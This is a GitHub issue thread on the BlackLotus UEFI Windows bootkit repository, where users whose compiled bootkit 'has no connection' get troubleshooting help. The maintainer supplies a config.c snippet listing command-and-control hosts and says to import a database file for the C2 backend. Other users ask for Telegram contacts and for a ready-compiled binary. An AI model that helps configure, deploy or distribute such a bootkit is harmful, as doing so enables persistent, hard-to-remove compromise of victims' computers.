ldpreload / BlackLotus

BlackLotus UEFI Windows Bootkit
1.91k stars 459 forks source link

Compiled Success but no connection #18

Closed worldlevelpen closed 12 months ago

worldlevelpen commented 1 year ago

I just compiled with no error and code seems perfect. but no connection anyone can help.

wgetnz commented 1 year ago

i have the same problem

ghost commented 1 year ago

same lol, just broken 💀

ldpreload commented 12 months ago

Inside of Shared/config.c, you can actually list multiple hosts for your C2. Make sure you've got the right host, IP address, or whatever your C2 needs.

#include <Windows.h>
#include "config.h"

LPTSTR      g_Hosts[]    = { "127.0.0.1", "10.0.0.65", NULL};
UCHAR      g_NumberHosts  = (UCHAR)(sizeof(g_Hosts) / sizeof(LPTSTR));

Please also make sure to import the SQL file located in private/db.sql to MySQL (or whichever SQL server you prefer).

Final result: photo

gabriel-maxx commented 9 months ago

@worldlevelpen Do you have Telegram?

unfairDude commented 6 months ago

I just compiled with no error and code seems perfect. but no connection anyone can help.

can you share with me the compiled version? i Cant get it working

unfairDude commented 6 months ago

@worldlevelpen Do you have Telegram?

did u manage to compile it